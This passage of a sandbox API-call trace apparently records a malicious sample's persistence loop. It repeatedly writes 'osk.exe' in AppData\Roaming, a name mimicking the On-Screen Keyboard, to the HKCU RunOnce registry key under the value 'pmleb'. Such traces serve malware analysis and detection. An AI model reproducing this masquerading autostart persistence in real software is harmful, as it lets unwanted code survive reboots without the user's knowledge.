Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.461] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0077.461] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.461] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x9 [0077.461] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.462] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0077.462] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.462] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.462] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.462] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.462] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.462] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.462] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.462] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.463] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.463] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.463] RegCloseKey (hKey=0x280) returned 0x0 [0077.463] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.463] GetCurrentThreadId () returned 0x544 [0077.463] GetCurrentThreadId () returned 0x544 [0077.463] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.463] SetTimer (hWnd=0x20280, nIDEvent=0x2008, uElapse=0xa, lpTimerFunc=0x0) returned 0x2008 [0077.463] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.475] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.475] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.476] KillTimer (hWnd=0x20280, uIDEvent=0x2008) returned 1 [0077.476] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.476] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.476] IUnknown:Release (This=0x787518) returned 0x1 [0077.476] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.476] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.476] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.477] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.477] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0077.477] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.477] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xa [0077.477] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.478] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0077.478] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.478] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.478] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.478] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.478] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.478] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.478] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.478] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.479] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.479] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.479] RegCloseKey (hKey=0x280) returned 0x0 [0077.479] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.479] GetCurrentThreadId () returned 0x544 [0077.479] GetCurrentThreadId () returned 0x544 [0077.479] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.479] SetTimer (hWnd=0x20280, nIDEvent=0x2009, uElapse=0xa, lpTimerFunc=0x0) returned 0x2009 [0077.479] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.586] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.586] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.586] KillTimer (hWnd=0x20280, uIDEvent=0x2009) returned 1 [0077.586] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.586] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.586] IUnknown:Release (This=0x787518) returned 0x1 [0077.587] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.587] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.587] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.587] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.587] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0077.587] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.587] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xb [0077.587] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.588] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0077.588] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.588] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.588] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.588] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.588] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.588] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.589] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.589] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.589] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.589] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.589] RegCloseKey (hKey=0x280) returned 0x0 [0077.589] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.589] GetCurrentThreadId () returned 0x544 [0077.589] GetCurrentThreadId () returned 0x544 [0077.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.590] SetTimer (hWnd=0x20280, nIDEvent=0x200a, uElapse=0xa, lpTimerFunc=0x0) returned 0x200a [0077.590] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.600] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.600] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.600] KillTimer (hWnd=0x20280, uIDEvent=0x200a) returned 1 [0077.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.600] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.601] IUnknown:Release (This=0x787518) returned 0x1 [0077.601] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.601] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.601] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, 